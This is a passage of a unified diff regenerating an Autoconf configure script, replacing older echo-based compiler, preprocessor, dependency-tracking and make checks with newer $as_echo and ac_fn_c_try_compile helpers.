+$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "no acceptable C compiler found in \$PATH +See \`config.log' for more details." "$LINENO" 5; } + +# Provide some information about the compiler. +$as_echo "$as_me:${as_lineno-$LINENO}: checking for C compiler version" >&5 +set X $ac_compile +ac_compiler=$2 +for ac_option in --version -v -V -qversion; do + { { ac_try="$ac_compiler $ac_option >&5" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compiler $ac_option >&5") 2>conftest.err ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then + if test -s conftest.err; then + sed '10a\ +... rest of stderr output deleted ... + 10q' conftest.err >conftest.er1 + cat conftest.er1 >&5 + fi + rm -f conftest.er1 conftest.err + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C compiler" >&5 +$as_echo_n "checking whether we are using the GNU C compiler... " >&6; } +if test "${ac_cv_c_compiler_gnu+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : ac_compiler_gnu=yes else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_compiler_gnu=no + ac_compiler_gnu=no fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_cv_c_compiler_gnu=$ac_compiler_gnu fi -{ echo "$as_me:$LINENO: result: $ac_cv_c_compiler_gnu" >&5 -echo "${ECHO_T}$ac_cv_c_compiler_gnu" >&6; } -GCC=`test $ac_compiler_gnu = yes && echo yes` +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_compiler_gnu" >&5 +$as_echo "$ac_cv_c_compiler_gnu" >&6; } +if test $ac_compiler_gnu = yes; then + GCC=yes +else + GCC= +fi ac_test_CFLAGS=${CFLAGS+set} ac_save_CFLAGS=$CFLAGS -{ echo "$as_me:$LINENO: checking whether $CC accepts -g" >&5 -echo $ECHO_N "checking whether $CC accepts -g... $ECHO_C" >&6; } -if test "${ac_cv_prog_cc_g+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC accepts -g" >&5 +$as_echo_n "checking whether $CC accepts -g... " >&6; } +if test "${ac_cv_prog_cc_g+set}" = set; then : + $as_echo_n "(cached) " >&6 else ac_save_c_werror_flag=$ac_c_werror_flag ac_c_werror_flag=yes ac_cv_prog_cc_g=no CFLAGS="-g" - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -3011,34 +3898,11 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then +if ac_fn_c_try_compile "$LINENO"; then : ac_cv_prog_cc_g=yes else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - CFLAGS="" - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + CFLAGS="" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -3049,35 +3913,12 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then - : -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 +if ac_fn_c_try_compile "$LINENO"; then : - ac_c_werror_flag=$ac_save_c_werror_flag +else + ac_c_werror_flag=$ac_save_c_werror_flag CFLAGS="-g" - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -3088,42 +3929,18 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then +if ac_fn_c_try_compile "$LINENO"; then : ac_cv_prog_cc_g=yes -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_c_werror_flag=$ac_save_c_werror_flag fi -{ echo "$as_me:$LINENO: result: $ac_cv_prog_cc_g" >&5 -echo "${ECHO_T}$ac_cv_prog_cc_g" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_g" >&5 +$as_echo "$ac_cv_prog_cc_g" >&6; } if test "$ac_test_CFLAGS" = set; then CFLAGS=$ac_save_CFLAGS elif test $ac_cv_prog_cc_g = yes; then @@ -3139,18 +3956,14 @@ else CFLAGS= fi fi -{ echo "$as_me:$LINENO: checking for $CC option to accept ISO C89" >&5 -echo $ECHO_N "checking for $CC option to accept ISO C89... $ECHO_C" >&6; } -if test "${ac_cv_prog_cc_c89+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $CC option to accept ISO C89" >&5 +$as_echo_n "checking for $CC option to accept ISO C89... " >&6; } +if test "${ac_cv_prog_cc_c89+set}" = set; then : + $as_echo_n "(cached) " >&6 else ac_cv_prog_cc_c89=no ac_save_CC=$CC -cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF +cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include @@ -3207,31 +4020,9 @@ for ac_arg in '' -qlanglvl=extc89 -qlanglvl=ansi -std \ -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" do CC="$ac_save_CC $ac_arg" - rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then + if ac_fn_c_try_compile "$LINENO"; then : ac_cv_prog_cc_c89=$ac_arg -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - fi - rm -f core conftest.err conftest.$ac_objext test "x$ac_cv_prog_cc_c89" != "xno" && break done @@ -3242,92 +4033,32 @@ fi # AC_CACHE_VAL case "x$ac_cv_prog_cc_c89" in x) - { echo "$as_me:$LINENO: result: none needed" >&5 -echo "${ECHO_T}none needed" >&6; } ;; + { $as_echo "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 +$as_echo "none needed" >&6; } ;; xno) - { echo "$as_me:$LINENO: result: unsupported" >&5 -echo "${ECHO_T}unsupported" >&6; } ;; + { $as_echo "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 +$as_echo "unsupported" >&6; } ;; *) CC="$CC $ac_cv_prog_cc_c89" - { echo "$as_me:$LINENO: result: $ac_cv_prog_cc_c89" >&5 -echo "${ECHO_T}$ac_cv_prog_cc_c89" >&6; } ;; + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c89" >&5 +$as_echo "$ac_cv_prog_cc_c89" >&6; } ;; esac +if test "x$ac_cv_prog_cc_c89" != xno; then : +fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu -DEPDIR="${am__leading_dot}deps" - -ac_config_commands="$ac_config_commands depfiles" - - -am_make=${MAKE-make} -cat > confinc << 'END' -am__doit: - @echo done -.PHONY: am__doit -END -# If we don't find an include directive, just comment out the code. -{ echo "$as_me:$LINENO: checking for style of include used by $am_make" >&5 -echo $ECHO_N "checking for style of include used by $am_make... $ECHO_C" >&6; } -am__include="#" -am__quote= -_am_result=none -# First try GNU make style include. -echo "include confinc" > confmf -# We grep out `Entering directory' and `Leaving directory' -# messages which can occur if `w' ends up in MAKEFLAGS. -# In particular we don't look at `^make:' because GNU make might -# be invoked under some other name (usually "gmake"), in which -# case it prints its new name instead of `make'. -if test "`$am_make -s -f confmf 2> /dev/null | grep -v 'ing directory'`" = "done"; then - am__include=include - am__quote= - _am_result=GNU -fi -# Now try BSD make style include. -if test "$am__include" = "#"; then - echo '.include "confinc"' > confmf - if test "`$am_make -s -f confmf 2> /dev/null`" = "done"; then - am__include=.include - am__quote="\"" - _am_result=BSD - fi -fi - - -{ echo "$as_me:$LINENO: result: $_am_result" >&5 -echo "${ECHO_T}$_am_result" >&6; } -rm -f confinc confmf - -# Check whether --enable-dependency-tracking was given. -if test "${enable_dependency_tracking+set}" = set; then - enableval=$enable_dependency_tracking; -fi - -if test "x$enable_dependency_tracking" != xno; then - am_depcomp="$ac_aux_dir/depcomp" - AMDEPBACKSLASH='\' -fi - if test "x$enable_dependency_tracking" != xno; then - AMDEP_TRUE= - AMDEP_FALSE='#' -else - AMDEP_TRUE='#' - AMDEP_FALSE= -fi - - depcc="$CC" am_compiler_list= -{ echo "$as_me:$LINENO: checking dependency style of $depcc" >&5 -echo $ECHO_N "checking dependency style of $depcc... $ECHO_C" >&6; } -if test "${am_cv_CC_dependencies_compiler_type+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 +$as_echo_n "checking dependency style of $depcc... " >&6; } +if test "${am_cv_CC_dependencies_compiler_type+set}" = set; then : + $as_echo_n "(cached) " >&6 else if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then # We make a subdir and do the tests there. Otherwise we can end up @@ -3352,6 +4083,11 @@ else if test "$am_compiler_list" = ""; then am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` fi + am__universal=false + case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac + for depmode in $am_compiler_list; do # Setup a source with many dependencies, because some compilers # like to wrap large dependency lists on column 80 (with \), and @@ -3369,7 +4105,17 @@ else done echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; nosideeffect) # after this tag, mechanisms are not by side-effect, so they'll # only be used when explicitly requested @@ -3379,19 +4125,23 @@ else break fi ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; none) break ;; esac - # We check with `-c' and `-o' for the sake of the "dashmstdout" - # mode. It turns out that the SunPro C++ compiler does not properly - # handle `-M -o', and we need to detect this. if depmode=$depmode \ - source=sub/conftest.c object=sub/conftest.${OBJEXT-o} \ + source=sub/conftest.c object=$am__obj \ depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ - $SHELL ./depcomp $depcc -c -o sub/conftest.${OBJEXT-o} sub/conftest.c \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ >/dev/null 2>conftest.err && grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && - grep sub/conftest.${OBJEXT-o} sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && ${MAKE-make} -s -f confmf > /dev/null 2>&1; then # icc doesn't choke on unknown options, it will just issue warnings # or remarks (even with -Werror). So we grep stderr for any message @@ -3415,8 +4165,8 @@ else fi fi -{ echo "$as_me:$LINENO: result: $am_cv_CC_dependencies_compiler_type" >&5 -echo "${ECHO_T}$am_cv_CC_dependencies_compiler_type" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CC_dependencies_compiler_type" >&5 +$as_echo "$am_cv_CC_dependencies_compiler_type" >&6; } CCDEPMODE=depmode=$am_cv_CC_dependencies_compiler_type if @@ -3431,22 +4181,18 @@ fi if test "x$CC" != xcc; then - { echo "$as_me:$LINENO: checking whether $CC and cc understand -c and -o together" >&5 -echo $ECHO_N "checking whether $CC and cc understand -c and -o together... $ECHO_C" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC and cc understand -c and -o together" >&5 +$as_echo_n "checking whether $CC and cc understand -c and -o together... " >&6; } else - { echo "$as_me:$LINENO: checking whether cc understands -c and -o together" >&5 -echo $ECHO_N "checking whether cc understands -c and -o together... $ECHO_C" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether cc understands -c and -o together" >&5 +$as_echo_n "checking whether cc understands -c and -o together... " >&6; } fi -set dummy $CC; ac_cc=`echo $2 | +set dummy $CC; ac_cc=`$as_echo "$2" | sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` -if { as_var=ac_cv_prog_cc_${ac_cc}_c_o; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +if { as_var=ac_cv_prog_cc_${ac_cc}_c_o; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -3462,58 +4208,63 @@ _ACEOF # existing .o file with -o, though they will create one. ac_try='$CC -c conftest.$ac_ext -o conftest2.$ac_objext >&5' rm -f conftest2.* -if { (case "(($ac_try" in +if { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && - test -f conftest2.$ac_objext && { (case "(($ac_try" in + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && + test -f conftest2.$ac_objext && { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then eval ac_cv_prog_cc_${ac_cc}_c_o=yes if test "x$CC" != xcc; then # Test first that cc exists at all. if { ac_try='cc -c conftest.$ac_ext >&5' - { (case "(($ac_try" in + { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; }; then + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then ac_try='cc -c conftest.$ac_ext -o conftest2.$ac_objext >&5' rm -f conftest2.* - if { (case "(($ac_try" in + if { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && - test -f conftest2.$ac_objext && { (case "(($ac_try" in + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && + test -f conftest2.$ac_objext && { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then # cc works too. : @@ -3526,27 +4277,26 @@ eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 else eval ac_cv_prog_cc_${ac_cc}_c_o=no fi -rm -f -r core conftest* +rm -f core conftest* fi if eval test \$ac_cv_prog_cc_${ac_cc}_c_o = yes; then - { echo "$as_me:$LINENO: result: yes" >&5 -echo "${ECHO_T}yes" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } -cat >>confdefs.h <<\_ACEOF -#define NO_MINUS_C_MINUS_O 1 -_ACEOF +$as_echo "#define NO_MINUS_C_MINUS_O 1" >>confdefs.h fi # FIXME: we rely on the cache variable name because # there is no other way. set dummy $CC -ac_cc=`echo $2 | sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` -if eval "test \"`echo '$ac_cv_prog_cc_'${ac_cc}_c_o`\" != yes"; then +am_cc=`echo $2 | sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` +eval am_t=\$ac_cv_prog_cc_${am_cc}_c_o +if test "$am_t" != yes; then # Losing compiler, so override with the script. # FIXME: It is wrong to rewrite CC. # But if we don't then we get into trouble of one sort or another. @@ -3556,91 +4306,13 @@ if eval "test \"`echo '$ac_cv_prog_cc_'${ac_cc}_c_o`\" != yes"; then fi -# Find a good install program. We prefer a C program (faster), -# so one script is as good as another. But avoid the broken or -# incompatible versions: -# SysV /etc/install, /usr/sbin/install -# SunOS /usr/etc/install -# IRIX /sbin/install -# AIX /bin/install -# AmigaOS /C/install, which installs bootblocks on floppy discs -# AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag -# AFS /usr/afsws/bin/install, which mishandles nonexistent args -# SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" -# OS/2's system install, which has a completely different semantic -# ./install, which can be erroneously created by make from ./install.sh. -{ echo "$as_me:$LINENO: checking for a BSD-compatible install" >&5 -echo $ECHO_N "checking for a BSD-compatible install... $ECHO_C" >&6; } -if test -z "$INSTALL"; then -if test "${ac_cv_path_install+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - # Account for people who put trailing slashes in PATH elements. -case $as_dir/ in - ./ | .// | /cC/* | \ - /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ - ?:\\/os2\\/install\\/* | ?:\\/OS2\\/INSTALL\\/* | \ - /usr/ucb/* ) ;; - *) - # OSF1 and SCO ODT 3.0 have their own names for install. - # Don't use installbsd from OSF since it installs stuff as root - # by default. - for ac_prog in ginstall scoinst install; do - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_prog$ac_exec_ext" && $as_test_x "$as_dir/$ac_prog$ac_exec_ext"; }; then - if test $ac_prog = install && - grep dspmsg "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then - # AIX install. It has an incompatible calling convention. - : - elif test $ac_prog = install && - grep pwplus "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then - # program-specific install script used by HP pwplus--don't use. - : - else - ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" - break 3 - fi - fi - done - done - ;; -esac -done -IFS=$as_save_IFS - -fi - if test "${ac_cv_path_install+set}" = set; then - INSTALL=$ac_cv_path_install - else - # As a last resort, use the slow shell script. Don't cache a - # value for INSTALL within a source directory, because that will - # break other packages using the cache if that directory is - # removed, or if the value is a relative name. - INSTALL=$ac_install_sh - fi -fi -{ echo "$as_me:$LINENO: result: $INSTALL" >&5 -echo "${ECHO_T}$INSTALL" >&6; } - -# Use test -z because SunOS4 sh mishandles braces in ${var-val}. -# It thinks the first close brace ends the variable substitution. -test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' - -test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' - -test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' - -{ echo "$as_me:$LINENO: checking whether ${MAKE-make} sets \$(MAKE)" >&5 -echo $ECHO_N "checking whether ${MAKE-make} sets \$(MAKE)... $ECHO_C" >&6; } -set x ${MAKE-make}; ac_make=`echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` -if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +$as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } +set x ${MAKE-make} +ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` +if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 else cat >conftest.make <<\_ACEOF SHELL = /bin/sh @@ -3657,12 +4329,12 @@ esac rm -f conftest.make fi if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then - { echo "$as_me:$LINENO: result: yes" >&5 -echo "${ECHO_T}yes" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } SET_MAKE= else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } SET_MAKE="MAKE=${MAKE-make}" fi @@ -3676,15 +4348,15 @@ ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu -{ echo "$as_me:$LINENO: checking how to run the C preprocessor" >&5 -echo $ECHO_N "checking how to run the C preprocessor... $ECHO_C" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking how to run the C preprocessor" >&5 +$as_echo_n "checking how to run the C preprocessor... " >&6; } # On Suns, sometimes $CPP names a directory. if test -n "$CPP" && test -d "$CPP"; then CPP= fi if test -z "$CPP"; then - if test "${ac_cv_prog_CPP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 + if test "${ac_cv_prog_CPP+set}" = set; then : + $as_echo_n "(cached) " >&6 else # Double quotes because CPP needs to be expanded for CPP in "$CC -E" "$CC -E -traditional-cpp" "/lib/cpp" @@ -3698,11 +4370,7 @@ do # exists even on freestanding compilers. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #ifdef __STDC__ # include @@ -3711,76 +4379,34 @@ cat >>conftest.$ac_ext <<_ACEOF #endif Syntax error _ACEOF -if { (ac_try="$ac_cpp conftest.$ac_ext" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_cpp conftest.$ac_ext") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } >/dev/null && { - test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || - test ! -s conftest.err - }; then - : -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 +if ac_fn_c_try_cpp "$LINENO"; then : +else # Broken: fails on valid input. continue fi - rm -f conftest.err conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF -if { (ac_try="$ac_cpp conftest.$ac_ext" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_cpp conftest.$ac_ext") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } >/dev/null && { - test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || - test ! -s conftest.err - }; then +if ac_fn_c_try_cpp "$LINENO"; then : # Broken: success on invalid input. continue else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - # Passes both tests. ac_preproc_ok=: break fi - rm -f conftest.err conftest.$ac_ext done # Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.err conftest.$ac_ext -if 